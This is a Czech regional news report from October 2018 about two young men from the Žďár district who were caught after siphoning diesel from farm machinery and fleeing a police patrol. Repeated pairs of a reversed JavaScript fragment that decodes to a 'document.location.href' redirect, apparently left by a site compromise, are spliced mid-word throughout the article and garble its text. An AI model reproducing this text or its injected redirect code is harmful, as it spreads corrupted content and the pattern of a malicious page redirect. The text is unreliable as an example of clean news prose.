Rainbow page separator

Policisté dopadli zloděje nafty, chtěli před hlídkou ujet

Pátek, 19. října 2018

Žďársko / Na několika místech okresu se pohybovali dva zloději nafty, které se podařilo dopadnout policistům na Velkomeziříčsku. Dále jsou ti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pachatelé podezřelí i z krádeží nafty ze zemědělských strojů, ke kterým v okrese došlo na konci srpna, tudíž jim hrozí až dva roky vězení.
„Dva muže ze Žďárska ve věku jednadvacet a dvacet let dopadli policisté 11. října. 10. října krátce před půlnocí byli oba na volně přístupném pozemku v osadě Mostiště, kde odčerpali a odcizili pětadvacet litrů mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torové nafty ze zaparkovaného kombajnu. Následně ve stejné vsi poškodili uzavírání palivové nádrže u trak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru značky Liaz, odkud odčerpali a odcizili dva litry nafty,“ popsala policejní mluvčí Stanislava Miláčková. Zloději poté odjeli směrem k Měřínu, kde je zaregistrovala policejní hlídka a rozhodla se je zkontrolovat. Muži začali ujíždět, policisté je pronásledovali a au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil zastavili v měřínské ulici Brněnská. V autě pak hlídka našla plas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový sud s dvaceti litry nafty a v kufru plas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové hadice.
Dalším prověřováním policisté zjistili, že mladíci mají co do činění také s krádežemi nafty, k nimž došlo na konci srpna v Lísku na Bystřicku. Tam nejdříve odčerpali čtyřicet litů nafty ze zaparkovaného trak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru a o dva dny později se do vesnice vrátili a z dalších dvou trak[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů odcizili více jak dvě stě litrů nafty.